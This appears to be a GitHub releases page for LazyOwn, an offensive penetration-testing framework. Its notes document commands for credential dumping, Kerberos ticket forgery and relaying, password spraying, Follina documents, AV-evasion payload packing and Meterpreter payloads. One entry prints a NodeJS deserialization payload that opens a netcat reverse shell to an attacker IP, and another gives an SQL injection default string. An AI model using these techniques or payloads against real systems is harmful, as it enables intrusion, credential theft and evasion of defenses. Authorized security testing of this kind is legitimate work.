Releases · grisuno/LazyOwn

07 Dec 02:00

grisuno

release/0.2.22

226aa62

release/0.2.22 Latest

Latest

What's Changed

some utils 7 jajaja? by @grisuno in #71

Full Changelog: release/0.2.21...release/0.2.22

spraykatz

Executes the Spraykatz tool to retrieve credentials on Windows machines and large Active Directory environments.

This function:
- Installs Spraykatz if not already installed.
- Executes the Spraykatz command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, git, and nmap to be installed.
- Uses parameters from self.params for username, password, and target.

Usage:
spraykatz

caldera

Installs and starts the Caldera server.

This function:
- Clones the Caldera repository recursively.
- Installs the required dependencies.
- Optionally installs GoLang (1.19+).
- Starts the Caldera server with the provided parameters.

Behavior:
- Requires git, python3, and pip3 to be installed.
- Uses parameters from self.params for version/release.

Usage:
caldera

ntpdate

Synchronizes the system clock with a specified NTP server.

This method constructs the target NTP server address using the domain and subdomain
parameters. It then prompts the user to confirm or modify the target address.
Finally, it executes the ntpdate command to synchronize the system clock with
the specified NTP server.

:param line: The command line input (not used in this method).
:type line: str
:return: None

ticketer

Executes the Impacket ticketer tool to create a golden ticket.

This function performs the following actions:

Checks if the target host is valid.
Prompts the user for the NTLM hash, domain SID, domain name, DC IP, SPN, and username.
Constructs and executes the Impacket ticketer command with the provided information.

Parameters:
line (str): A command argument to determine the authentication mode.
This parameter is not used in this function.

Returns:
None

rsync

Synchronizes the local "sessions" directory to a remote host using rsync, leveraging sshpass for automated authentication.

Steps:
1. Verifies if the credentials file exists in the "sessions" directory.
If not, prompts the user for a username and password.
2. Reads the credentials file if it exists and extracts the username and password.
3. Constructs an rsync command to deploy the "sessions" directory to the remote host.
4. Executes the rsync command using the system shell.

Args:
line (str): Input command line (not used in the current implementation).

Dependencies:
- The sshpass command-line tool must be installed on the local machine.
- rsync must be installed on both the local and remote machines.
- The remote host must be accessible via SSH.

Attributes:
- self.params: Dictionary containing the following keys:
- username (str, optional): Predefined username. Defaults to prompting the user if not provided.
- password (str, optional): Predefined password. Defaults to prompting the user if not provided.
- rhost (str): Remote host's IP or domain name.

Raises:
- KeyError: If rhost is not provided in self.params.
- FileNotFoundError: If the "sessions" directory does not exist.

Note:
- The credentials.txt file, if present, should have credentials in the format username:password
on the first line.

Returns:
None

pre2k

Executes the pre2k tool to query the domain for pre-Windows 2000 machine accounts or to pass a list of hostnames to test authentication.

This function:
- Installs pre2k if not already installed.
- Executes the pre2k command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
pre2k auth -u -p -d -dc-ip <dc_ip>
pre2k unauth -d -dc-ip <dc_ip> -inputfile

gmsadumper

Executes the gMSADumper tool to read and parse gMSA password blobs accessible by the user.

This function:
- Installs gMSADumper if not already installed.
- Executes the gMSADumper command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
gmsadumper -u -p -d
gmsadumper -u -p <LM:NT hash> -d -l <ldap_server>
gmsadumper -k -d -l <ldap_server>

dnschef

Executes the DNSChef tool to monitor DNS queries and intercept responses.

This function:
- Installs DNSChef if not already installed.
- Executes the DNSChef command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
dnschef

dploot

Executes the dploot tool to loot DPAPI related secrets from local or remote targets.
Actions: backupkey,blob,browser,certificates,credentials,machinecertificates,machinecredentials,machinemasterkeys,machinevaults,masterkeys,mobaxterm,rdg,sccm,vaults,wam,wifi
This function:
- Installs dploot if not already installed.
- Executes the dploot command with the provided parameters.
- Displays the result in the terminal.

Behavior:
- Requires python3, python3-pip, and git to be installed.
- Uses parameters from self.params for domain, username, password, and target.

Usage:
dploot -d -u -p -t
dploot -k -d -t

banners

createpayload

Generates an obfuscated payload to evade AV detection using the payloadGenerator tool. thanks to smokeme

This function:
- Clones the payloadGenerator repository if not already cloned.
- Installs .NET Framework 4.5 if not already installed.
- Executes the generator.py script with the provided IP, port, and XOR key.
- Displays the result in the terminal.
Parameters:
line (str): lenght of xor key
Behavior:
- Requires git and dotnet to be installed.
- Uses parameters from self.params for IP, port, and XOR key.

Usage:
createpayload

bin2shellcode

Converts a binary file to a shellcode string in C or Nim format.

This function:
- Reads a binary file and converts its contents to a shellcode string.
- Supports both C and Nim formats.
- Displays the result in the terminal and saves it to a file.

Behavior:
- Requires the filename, width, quotes, and format parameters.
- Uses default values if parameters are not provided.
- Uses parameters from self.params for filename, width, quotes, and format.

Usage:
bin2shellcode [ [ [ []]]]

Contributors

grisuno

Assets 2

0 Join discussion

25 Nov 06:54

grisuno

release/0.2.21

dc4b8d4

release/0.2.21

What's Changed

some utils 6 jajaja? by @grisun0 in #69

Full Changelog: release/0.2.20...release/0.2.21

utf

Encode a given payload into UTF-16 escape sequences.

This function takes a payload string and encodes each character into its
UTF-16 hexadecimal representation (e.g., A becomes A). If no
payload is provided as input, it prompts the user to input one, with a
default value of ' or 1=1-- -.

Parameters:
line (str): The input payload to encode. If empty, the user is prompted
to provide one interactively.

Returns:
None: The encoded payload is printed to the console.

dcomexec

Executes the Impacket dcomexec tool to run commands on a remote system using DCOM.

This function performs the following actions:

Validates the target host (rhost) and domain parameters.
If the line argument is "pass", it searches for credential files with the pattern credentials*.txt,
allows the user to select credentials, and constructs the dcomexec command using them.
If the line argument is "hash", it searches for a hash file, prompts the user for a username, and
constructs the dcomexec command using the hash.
If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): A command argument to determine the authentication mode.
If "pass", the function searches for credential files and authenticates using the selected file.
If "hash", it uses a hash file for authentication.
If neither, it prints an error message with usage instructions.

Returns:
None

pip_repo

Sets up a local pip repository and serves it via an HTTP server for offline installations.

This function performs the following actions:

Creates a directory for storing pip packages if it does not already exist.
Downloads a predefined list of Python packages along with their dependencies to the repository directory.
Organizes the downloaded packages into their respective directories.
Starts an HTTP server to host the repository, allowing remote machines to install the packages.

The repository path is created under the sessions directory, and the packages are served using Python's
built-in HTTP server at port 8008.

Parameters:
line (str): Optional argument for the command. Not used in this implementation but retained for compatibility
with the cmd2 framework.

Returns:
None

apt_repo

Creates a local APT repository and serves it via a web server.

This function performs the following actions:

Creates a directory for storing .deb packages.
Downloads the specified APT packages and their dependencies into the repository.
Generates the necessary APT repository indexes.
Starts a web server to host the repository for remote clients.

Parameters:
line (str): A space-separated list of package names to include in the repository.

Returns:
None

httprobe

Executes the httprobe tool to probe domains for working HTTP and HTTPS servers.

This function performs the following actions:

Verifies if httprobe is installed; if not, it installs the tool automatically.
Probes domains from the input file or standard input.
Simplifies the user experience by minimizing required commands and leveraging self.params for defaults.

Parameters:
line (str): Optional command arguments specifying the domain or just httprobe.
Example usage:
just provide the domain: httprobe example.com

Returns:
None

eyewitness_py

Automates EyeWitness installation and execution without requiring user input.

This function installs EyeWitness if it is not already available, uses a default input file
(urls.txt), and applies standard configurations to execute a web enumeration task
automatically. No arguments or manual intervention are needed from the user.

Behavior:
- Installs EyeWitness if missing.
- Uses urls.txt as the default input file.
- Sets a default timeout of 60 seconds.
- Automatically executes EyeWitness with predefined settings.

Usage:
witness

pup

Processes HTML content from a specified URL using the pup utility and a default CSS selector.

This function:
- Retrieves HTML content from the URL stored in self.params["url"] using curl.
- Filters the HTML content using the pup utility with a predefined CSS selector.
- Displays the filtered result in the terminal.

Behavior:
- Requires pup to be installed.
- Uses self.params["url"] as the source URL.
- Applies the CSS selector 'table table tr:nth-last-of-type(n+2) td.title a' by default.

Usage:
pup

recon

Performs reconnaissance on a specified domain using crt.sh (the target must be visible on internet), pup, httprobe, and EyeWitness.

This function automates the process of gathering subdomains for a given domain, verifying
their reachability, and generating a report using the EyeWitness tool.

Workflow:
1. Determines the target domain from the line argument or defaults to self.params["domain"].
2. Queries the crt.sh certificate transparency logs for subdomains using curl.
3. Filters and extracts domain-related text data using pup.
4. Sorts and removes duplicate entries, then validates subdomains with httprobe.
5. Saves the results to a temporary file.
6. Executes EyeWitness to generate a web-based reconnaissance report for the subdomains.

Requirements:
- pup: A command-line HTML parser.
- httprobe: A tool to check live HTTP/HTTPS endpoints.
- EyeWitness: A tool for generating web reconnaissance reports.

Parameters:
line (str): The domain to target for reconnaissance. If omitted, the domain defaults to self.params["domain"].

Examples:
1. Specify a domain directly:
>>> recon domain.com

2. Use the default domain from self.params:
    >>> recon

Raises:
None. Errors in execution will be logged or printed as part of the command output.

digdug

Executes Dig Dug to inflate the size of an executable file, leveraging pre-configured settings
and interactive input for minimal user effort.

This function integrates with the Dig Dug tool to increase an executable's size by appending
dictionary words. It automates repository setup, selects the input file from user prompts or defaults,
and uses sensible configurations to execute the inflation process. Dig Dug is particularly useful
for evading AV/EDR detections by exceeding size thresholds for analysis.

Behavior:
- Automatically clones the Dig Dug repository if not already present in external/.exploit/DigDug.
- Calls the venom command to prepare the necessary payloads for execution.
- Prompts the user to select an input executable and specify the desired size increase.
- Uses a default dictionary (google-10000-english-usa-gt5.txt) for padding.

Requirements:
- A Python environment with required dependencies.
- Executable files available in the working directory or sessions.

Usage:
Invoke this function to inflate the size of a generated payload or user-specified executable.
Interactive prompts will guide the input selection and size configuration.

Examples:
1. Increase the size of a selected payload by 100 MB:
>>> digdug

2. Use the default configurations to inflate an executable:
    No additional parameters are required. The user is prompted for size and file selection.

adsso_spray

Performs a password spray attack on Azure Active Directory Seamless Single Sign-On (SSO) using a specified list of users.

This function automates the process of spraying a given password across multiple user accounts in a target domain. It utilizes
a user list in the form of a text file, targeting Azure AD Seamless SSO endpoints. The results are processed and saved to
a specified output file, providing insights into which accounts were successful or failed during the attack.

Requirements:
- A valid domain and URL for the target Azure AD instance. (assing url https://url.com)
- A user dictionary file containing usernames (without the domain) to be sprayed.

Parameters:
line (str): Command-line input passed to the function (not currently used in the function).

Behavior:
- Loads the domain and URL from the configuration stored in self.params.
- Reads the user list from a file specified in get_users_dic.
- Sprays the specified password to all users and processes the results.
- Saves the successful and failed attempts to the output file.

Example:
- Perform a password spray attack with the password "admin" and save the results:
>>> adsso_spray
- Customize the password or user list by modifying self.params before invoking the function.

creds_py

Searches for default credentials associated with a specific product or vendor, using the Default Credentials Cheat Sheet.

This function automates the process of querying the Default Credentials Cheat Sheet for default credentials of various products.
It searches for the specified product or vendor, providing relevant default credentials for pentesters during engagements.

Behavior:
- Automatically clones the Default Credentials Cheat Sheet repository if not already present in external/.exploit/DefaultCreds.
- Executes a search command with the product/vendor specified by the user.
- Returns the default credentials for the requested product or vendor.

Requirements:
- Python environment with necessary dependencies.
- Access to the Default Credentials Cheat Sheet repository.

Usage:
Run this function to search for default credentials related to a product or vendor.
The user is p...

Contributors

grisun0

Assets 2

0 Join discussion

21 Nov 01:48

grisuno

release/0.2.20

fc410d8

release/0.2.20

What's Changed

some utils 5 jajaja? by @grisun0 in #67

Full Changelog: release/0.2.19...release/0.2.20

getnthash_py

Executes the getnthash.py tool from PKINITtools to retrieve the NT hash using a Kerberos U2U TGS request.

This function performs the following actions:

Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies.
Retrieves the NT hash using the AS-REP key from a previously generated TGT.

Parameters:
line (str): Command arguments specifying the AS-REP key and target identity.
Expected format:
- identity
- Additional flags like -key KEY, -dc-ip ip address, etc.

Returns:
None

gets4uticket_py

Executes the gets4uticket.py tool from PKINITtools to request an S4U2Self service ticket using Kerberos.

This function performs the following actions:

Checks if PKINITtools is installed; if not, it clones the repository and installs dependencies.
Requests a service ticket using the S4U2Self protocol and outputs it to the specified ccache file.

Parameters:
line (str): Command arguments specifying the kerberos_connection_url, SPN, target user, and ccache.
Expected format:
- kerberos_connection_url spn targetuser ccache
- Additional flags like -v for verbose output.

Returns:
None

aclpwn_py

Executes the aclpwn.py tool to find and exploit ACL paths for privilege escalation in an Active Directory environment.

This function performs the following actions:

Checks if aclpwn is installed; if not, it installs the package.
Finds an exploit path using specified starting and target points in Active Directory.
Executes the path to escalate privileges if the path is found.

Parameters:
line (str): Command arguments specifying the find and target points, domain, and optional flags.
Expected format:
- -f starting_point -ft starting_type -d domain
- Additional flags like -t target, -tt target_type, --server, -dry, --restore, etc.

Returns:
None

addspn_py

Executes the addspn.py tool to manage Service Principal Names (SPNs) on Active Directory accounts via LDAP.

This function performs the following actions:

Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
Adds, removes, or queries SPNs on the specified target based on the provided options.

Parameters:
line (str): Command arguments specifying the target hostname, user credentials, and SPN actions.
Expected format:
- hostname user password target spn -options
- Options include:
- -r to remove an SPN
- -q to query current SPNs
- -a to add SPN via msDS-AdditionalDnsHostName

Returns:
None

dnstool_py

Executes the dnstool.py tool to modify Active Directory-integrated DNS records.

This function performs the following actions:

Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
Modifies DNS records by adding, removing, or querying based on the specified options.

Parameters:
line (str): Command arguments specifying the DNS action, target record, and data.
Expected format:
- hostname user password record action -options
- Options include:
- -a to add a record
- -r to remove a record
- --forest to target ForestDnsZones

Returns:
None

printerbug_py

Executes the printerbug.py tool to trigger the SpoolService bug via RPC backconnect.

This function performs the following actions:

Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
Executes the printerbug tool to attempt an RPC backconnect to the specified attacker host.

Parameters:
line (str): Command arguments specifying the target and attacker host.
Expected format:
- target_username@target_host attacker_host

Returns:
None

krbrelayx_py

Executes the krbrelayx.py tool for Kerberos relaying or unconstrained delegation abuse.

This function performs the following actions:

Checks if Krbrelayx is installed; if not, it clones the repository and installs dependencies.
Relays Kerberos tickets or abuses unconstrained delegation to access target services.

Parameters:
line (str): Command arguments specifying the target and options.
Expected format:
- target options
- Options include:
- -t target_host to specify the target host
- -l loot directory to save TGTs or dump information

Returns:
None

autoblody

Executes the autobloody tool for automating Active Directory privilege escalation paths.

This function performs the following actions:

Checks if autobloody is installed; if not, it clones the repository and installs dependencies.
Executes the autobloody command to find and exploit privilege escalation paths.

Parameters:
line (str): Command arguments specifying the source and target objects and options.
Expected format:
- -u username for NTLM authentication
- -p password for NTLM authentication
- --host domain_controller_ip for the IP of the Domain Controller
- -dp neo4j_password for Neo4j database password
- -ds source_label for the source node label in BloodHound
- -dt target_label for the target node label in BloodHound

Returns:
None

upload_gofile

Uploads a file to Gofile storage.

This function performs the following actions:

Prepares the file and folder ID for upload.
Sends a POST request to Gofile API with the file and authorization token.
Handles the response from the API and prints the result.

Parameters:
line (str): Command arguments specifying the file path and options.
Expected format:
- <file_path>
- Options include:
- --folderId <folder_id> to specify the folder where the file should be uploaded

Returns:
None

unicode_WAFbypass

    We open a Netcat listener on port 443 and attempt to exploit NodeJS deserialization by sending the
    following payload:
    {"rce":"_$$ND_FUNC$$_function() {require('child_process').exec('nc -e /bin/bash 10.10.xx.xx 443',function(error,stdout,stderr) {console.log (stdout) });

}()"}
Some WAF can be bypassed with the use of unicode characters.

    Generate an obfuscated payload, encode it in base64, and append the SSH public key to the authorized_keys file.
    
    Args:
        ip_address (str): The IP address for the reverse shell connection.
        port (int): The port for the reverse shell connection.
        ssh_public_key (str): The SSH public key to add to authorized_keys.
    
    Returns:
        str: The base64-encoded obfuscated payload.

sqli_mssql_test

Initiates a reverse MSSQL shell by starting an HTTP server to handle incoming connections and exfiltrate data.

This function does the following:

Starts an HTTP server to listen for connections from the MSSQL server.
Intercepts and decodes responses from the target server.
Prompts the user to enter commands, sends them to the target, and displays the output.

Parameters:
line (str): Unused command argument from the cmd2 prompt.

Returns:
None

targetedKerberoas

Executes the targetedKerberoast tool for extracting Kerberos service tickets.

This function performs the following actions:

Verifies the presence of the targetedKerberoast tool; if not installed, it clones the repository and installs dependencies.
Prompts for parameters such as the domain, username, and other configurations required by targetedKerberoast.
Executes the targetedKerberoast tool with specified options for obtaining "kerberoastable" hashes.

Parameters:
line (str): Command arguments specifying the user, domain, and options.
Expected format:
- domain user hash or password [optional parameters]

Returns:
None

pyoracle2

Executes the pyOracle2 tool for performing padding oracle attacks.

This function performs the following actions:

Verifies the presence of the pyOracle2 tool; if not installed, it clones the repository and installs dependencies.
Prompts the user for configuration parameters or retrieves them from self.params to create a job-specific configuration file.
Executes the pyOracle2 tool using the generated configuration file and specified options.

Parameters:
line (str): Command arguments specifying additional tool options if required.
Expected format: [optional parameters]

Returns:
None

paranoid_meterpreter

Creates and deploys a paranoid Meterpreter payload and listener with SSL/TLS pinning and UUID tracking.

This function performs the following actions:

Generates a self-signed SSL/TLS certificate for payload encryption.
Creates either staged or stageless Meterpreter payloads with UUID tracking and TLS pinning.
Configures and launches a Metasploit listener for the payload.

Parameters:
line (str): Command arguments specifying target configurations.
Expected format:
- rhost lhost domain subdomain

Returns:
None

lfi

Exploits a potential Local File Inclusion (LFI) vulnerability by crafting
and sending HTTP GET requests to a specified URL.

The user can specify the target URL directly via the line parameter or
provide it interactively. If no URL is provided, the method uses a default
value stored...

Contributors

grisun0

Assets 2

0 Join discussion

18 Nov 11:19

grisuno

release/0.2.19

a68b2f9

release/0.2.19

What's Changed

some utils 4 jajaja? by @grisun0 in #66

Full Changelog: release/0.2.18...release/0.2.19

Contributors

grisun0

Assets 2

17 Nov 06:21

grisuno

release/0.2.18

cc16581

release/0.2.18

What's Changed

some utils 3 jajaja by @grisun0 in #64

Full Changelog: release/0.2.17...release/0.2.18

Contributors

grisun0

Assets 2

0 Join discussion

12 Nov 02:15

grisuno

release/0.2.17

40799a5

release/0.2.17

Full Changelog: release/0.2.16...release/0.2.17

Assets 2

12 Nov 02:00

grisuno

release/0.2.16

b76a51a

release/0.2.16

What's Changed

some utils by @grisun0 in #61
some utils 2 by @grisuno in #62

Full Changelog: release/0.2.15...release/0.2.16

follina

Executes the MSDT Follina exploit tool to create malicious documents for exploitation.

This function performs the following actions:

Checks if follina.py is available; if not, it clones the repository and installs dependencies.
If the line argument is "default", it runs the tool with default parameters to pop calc.exe.
If the line argument is "notepad", it runs the tool to pop notepad.exe.
If the line argument is "reverse", it prompts for a port and runs the tool to get a reverse shell.
If the line does not match any valid options, it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the action mode.
- If "default", executes with default parameters.
- If "notepad", executes to pop notepad.exe.
- If "reverse", prompts for a port and executes for a reverse shell.
- If neither, displays an error message with usage instructions.

Returns:
None

sawks

Executes the Swaks (Swiss Army Knife for SMTP) tool to send test emails for phishing simulations.

This function performs the following actions:

Checks if Swaks is available; if not, it clones the repository to the appropriate directory.
Constructs the Swaks command with the specified 'to' and 'from' emails, server, and message body.
Runs the command using Swaks to simulate email delivery.

Parameters:
line (str): Command argument specifying additional options or the message body.
- If not provided, defaults to a basic test message.

Returns:
None

ad_ldap_enum

Executes ad-ldap-enum to enumerate Active Directory objects (users, groups, computers)
through LDAP, collecting extended information on group memberships and additional AD details.

This function enables the enumeration of Active Directory users, groups, and computers
by executing LDAP queries on a specified domain controller. The command constructed allows
password or Pass-the-Hash authentication, supports SSL/TLS, and IPv4/IPv6 connections,
and outputs data into CSV files detailing domain group memberships and extended user/computer
information.

Functionalities include:

Checking for credential availability and prompting for them if not found.
Constructing an LDAP enumeration command with customizable authentication and server details.
Executing ad-ldap-enum.py to output detailed information in CSV format.

The output files are saved in the current working directory with a prepend if specified.

Example command the function can build:

python3 ad-ldap-enum.py -d scrm.local -l 10.10.11.168 -u ksimpson -p ksimpson -v

Usage:
- Run dp_ad_ldap_enum to initiate AD object enumeration using ad-ldap-enum.

:param line: String containing initial command-line arguments or options.

unzip

Unzips a specified file from the sessions directory.

This function attempts to locate and unzip a file in the sessions directory.
If a filename is provided as line, it will use that; otherwise, it will attempt
to retrieve a zip file name based on existing zip files in the user's dictionary.
If the zip file is not found or does not exist in the sessions path, it prints
an error message.

Steps of execution:

Determines the zip file name from line or user dictionary.
Checks if the zip file exists within the sessions path.
Builds the unzip command and executes it to extract the contents of the zip file.

Usage example:
unzip filename.zip

:param line: The zip filename to be extracted. If empty, a zip file will be selected
automatically if available.
:return: None

regeorg

Executes the reGeorg tool for HTTP(s) tunneling through a SOCKS proxy.

This function performs the following actions:

Checks if the reGeorg tool is installed; if not, it clones the repository and sets up the environment.
Validates the command line arguments, specifically the port and URL required for the SOCKS proxy.
Constructs the command to run the reGeorg SOCKS proxy with the specified options and executes it.
Provides usage instructions in case of incorrect command line argument formats.

Parameters:
line (str): Command argument specifying the parameters for the reGeorg execution.
- The expected format is: " ", where is the listening port and is the URL
containing the tunnel script.

Returns:
None

rocky

Reduces a wordlist based on the specified password length.

This function filters the provided wordlist to only include passwords
that match the specified length. If no length is provided, it defaults
to 4. The function constructs a grep command to achieve this and executes
it.

Usage:
do_rocky(line: str)

:param line: The length of the passwords to filter in the wordlist.
This parameter should be a string representing a positive integer.
If not provided, the function prompts the user for input.
:type line: str
:raises ValueError: If the provided length is not a valid positive integer.

Example:
do_rocky('8')
# Executes: grep '^.{8}$' /usr/share/wordlists/rockyou.txt > sessions/lazypass_mini_rocky.txt

Contributors

grisuno and grisun0

Assets 2

0 Join discussion

08 Nov 04:46

grisun0

release/0.2.15

e5af1e5

release/0.2.15

What's Changed

too many commands documented at COMMANDS.md by @grisuno in #59

Full Changelog: release/0.2.14...release/0.2.15

name_the_hash

Identify hash type using nth after retrieving it with get_hash().

:param line: Line input for any additional parameters.

:returns: None

Manual execution:
To manually identify the hash, use the following command:

nth -t "{hash}"

This function fetches the hash using get_hash() and identifies its type. If nth is not installed, it is automatically installed.

refill_password

Generate a list of possible passwords by filling each asterisk in the input with user-specified characters.

:param line: A string containing asterisks (e.g., WebAO***7) for generating variations.

:returns: None

Process:
Prompts the user to enter characters to replace each asterisk, creates all possible combinations,
and saves them to 'sessions/passwords_refilled.txt'. If this file exists, the previous version is
renamed with a timestamp suffix.

sudo

Checks if the script is running with superuser (sudo) privileges, and if not,
restarts the script with sudo privileges.

This function verifies if the script is being executed with root privileges
by checking the effective user ID. If the script is not running as root,
it prints a warning message and restarts the script using sudo.

:return: None

netview

Executes the Impacket netview tool to list network shares on a specified target.

This function performs the following actions:

Checks if the target host is valid.
If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
and allows the user to select which file to use for executing the command.
If line is "hash", it searches for a hash file and prompts the user for a username, then constructs
and executes the command with the hash.
If line does not match "pass" or "hash", it displays an error message with usage instructions.

Returns:
None

wmiexec

Executes the Impacket WMIExec tool to run commands on a target system using WMI.

This function performs the following actions:

Checks if the target IP is valid.
If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
and allows the user to select which file to use for executing the command.
If line is "hash", it searches for a hash file and prompts the user for a username, then constructs
and executes the command with the hash.
If line does not match "pass" or "hash", it displays an error message with usage instructions.

Returns:
None

extract_ports

Extracts open ports and IP address information from a specified file.

This function performs the following actions:

Reads the specified file to find open ports.
If not port pass as an argument, Extracts the first unique IP address found in the file.
Prints the extracted information to the console.

Parameters:
line (str): The port to get information.

Returns:
None

cron

Schedules a command to run at a specified time.

This function allows users to schedule a command to execute at a specific hour and minute.
If the specified time has already passed for the current day, the command will be scheduled
to run the following day.

Usage:
cron HH:MM command [args]

Parameters:
line (str): The input string containing the scheduled time in 'HH:MM' format followed by the command and arguments.

Returns:
None

pezorsh

Executes the PEzor tool to pack executables or shellcode with custom configurations.

This function enables the user to construct commands for PEzor with various options.
By default, parameters are prompted to ensure successful execution without failure due to
missing values. It supports both executable and shellcode packing with the ability to
select from a range of PEzor flags to create the desired payload.

Functionalities of the function include:

Prompting the user to specify if they want to pack an executable or shellcode.
Gathering parameters for different PEzor flags based on user choices.
Building the command dynamically to execute PEzor.sh with the configured options.

Example commands the function can build:

Pack an executable with 64-bit, debug, and anti-debug options.
Pack shellcode with self-injection and sleep options.

Usage:
- Run 'PEzor [donut args...]' to pack an executable with donut options.
- Run 'PEzor ' to pack shellcode.

:param line: String containing initial command-line arguments or options.

mimikatzpy

Executes the Impacket Mimikatz tool to interact with a target system for credential-related operations.

This function performs the following actions:

Validates the target IP (rhost).
If the line argument is "pass", it searches for credential files matching the pattern credentials*.txt
and prompts the user to select a file for executing Mimikatz.
If line is "hash", it searches for a hash file, prompts for a username, and constructs the command using
the hash for authentication.
If line does not match "pass" or "hash", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the authentication mode.
If "pass", the function authenticates using credentials from a selected file.
If "hash", it uses a hash file for authentication.
If neither, it displays an error message with usage instructions.

Returns:
None

rdp_check_py

Executes the RDP check tool to verify credentials or hash-based authentication on a target system.

This function performs the following actions:

Validates the target IP (rhost).
If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
and prompts the user to select one to execute the RDP check.
If line is "hash", it searches for a hash file, prompts the user for a username, and constructs the command
using the hash for authentication.
If line does not match "pass" or "hash", it displays an error message with usage instructions.

Returns:
None

mqtt_check_py

Executes the MQTT check tool to verify credentials on a target system with optional SSL.

This function performs the following actions:

Validates the target IP (rhost).
If the line argument is "pass", it searches for credential files matching the pattern credentials*.txt
and prompts the user to select one to execute the MQTT check.
If line is "ssl", it performs the MQTT check with SSL enabled using the selected credentials.
If line does not match "pass" or "ssl", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the authentication mode.
If "pass", the function authenticates using credentials from a selected file.
If "ssl", it authenticates using SSL.
If neither, it displays an error message with usage instructions.

Returns:
None

lookupsid_py

Executes the LookupSID tool to perform SID enumeration on a target system.

This function performs the following actions:

Validates the target IP (rhost).
If the line argument is "basic", it searches for credential files with the pattern credentials*.txt
and prompts the user to select one to execute the SID lookup.
If line is "dc-target", it performs the SID lookup specifying domain controller and target IPs,
using the selected credentials.
If line does not match "basic" or "dc-target", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the lookup mode.
If "basic", the function performs a standard SID lookup.
If "dc-target", it includes -dc-ip and -target-ip arguments.
If neither, it displays an error message with usage instructions.

Returns:
None

scavenger

Executes the Scavenger tool for multi-threaded post-exploitation scanning on target systems with SMB credentials.

This function performs the following actions:

Checks if Scavenger is installed; if not, it clones the repository and installs dependencies.
If the line argument is "pass", it searches for credential files matching credentials*.txt,
prompts the user to select one, and executes Scavenger using the chosen credentials on a single target IP.
If the line argument is "targets", it prompts for an IP list file (iplist) and uses Scavenger with
credentials from a selected file on multiple target IPs with the --overwrite option.
If line does not match "pass" or "targets", it displays an error message with usage instructions.

Parameters:
line (str): Command argument specifying the authentication mode.
- If "pass", authenticates with c...

Contributors

grisuno

Assets 2

04 Nov 01:27

grisuno

release/0.2.14

63e8710

release/0.2.14

What's Changed

too many commands documented at COMMANDS.md by @grisuno in #57

Full Changelog: release/0.2.13...release/0.2.14

Contributors

grisuno

Assets 2

0 Join discussion

01 Nov 05:42

grisuno

release/0.2.13

bd201b0

release/0.2.13

Full Changelog: release/0.2.12...release/0.2.13

pykerbrute

Command pykerbrute: Automates the installation and execution of PyKerbrute for bruteforcing Active Directory accounts using Kerberos pre-authentication.

This function performs the following tasks:

Clones and installs PyKerbrute if not already installed.
Allows the user to choose between the EnumADUser.py and ADPwdSpray.py scripts.
Executes the selected script with user-defined parameters, including domain, mode (TCP/UDP), and selected hash or password.

Args:
line (str): Optional argument for specifying additional parameters for execution, such as domain controller, domain, and attack mode.

Returns:
None

reg_py

Run reg.py with specified parameters to query the registry.

:param line: Line input for any additional parameters.

:returns: None

Manual execution:
To manually run reg.py, use the following command:

reg.py -hashes :<hash> <domain>/<username>@<target> query -keyName <registry_key>

This function prompts the user for the hash, domain, username, and registry key if they are not already provided.

name_the_hash

Identify hash type using nth after retrieving it with get_hash().

:param line: Line input for any additional parameters.

:returns: None

Manual execution:
To manually identify the hash, use the following command:

nth -t "{hash}"

This function fetches the hash using get_hash() and identifies its type. If nth is not installed, it is automatically installed.

refill_password

Generate a list of possible passwords by filling each asterisk in the input with user-specified characters.

:param line: A string containing asterisks (e.g., WebAO***7) for generating variations.

:returns: None

sudo

Checks if the script is running with superuser (sudo) privileges, and if not,
restarts the script with sudo privileges.

:return: None

netview

Executes the Impacket netview tool to list network shares on a specified target.

This function performs the following actions:

Checks if the target host is valid.
If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
and allows the user to select which file to use for executing the command.
If line is "hash", it searches for a hash file and prompts the user for a username, then constructs
and executes the command with the hash.
If line does not match "pass" or "hash", it displays an error message with usage instructions.

Returns:
None

wmiexec

Executes the Impacket WMIExec tool to run commands on a target system using WMI.

This function performs the following actions:

Checks if the target IP is valid.
If the line argument is "pass", it searches for credential files with the pattern credentials*.txt
and allows the user to select which file to use for executing the command.
If line is "hash", it searches for a hash file and prompts the user for a username, then constructs
and executes the command with the hash.
If line does not match "pass" or "hash", it displays an error message with usage instructions.

Returns:
None

extract_ports

Extracts open ports and IP address information from a specified file.

This function performs the following actions:

Reads the specified file to find open ports.
If not port pass as an argument, Extracts the first unique IP address found in the file.
Prints the extracted information to the console.

Parameters:
line (str): The port to get information.

Returns:
None

cron

Schedules a command to run at a specified time.

Usage:
cron HH:MM command [args]

Parameters:
line (str): The input string containing the scheduled time in 'HH:MM' format followed by the command and arguments.

Returns:
None

pezorsh

Executes the PEzor tool to pack executables or shellcode with custom configurations.

Functionalities of the function include:

Prompting the user to specify if they want to pack an executable or shellcode.
Gathering parameters for different PEzor flags based on user choices.
Building the command dynamically to execute PEzor.sh with the configured options.

Example commands the function can build:

Pack an executable with 64-bit, debug, and anti-debug options.
Pack shellcode with self-injection and sleep options.

Usage:
- Run 'PEzor [donut args...]' to pack an executable with donut options.
- Run 'PEzor ' to pack shellcode.

:param line: String containing initial command-line arguments or options.

mimikatzpy

Executes the Impacket Mimikatz tool to interact with a target system for credential-related operations.

This function performs the following actions:

Validates the target IP (rhost).
If the line argument is "pass", it searches for credential files matching the pattern credentials*.txt
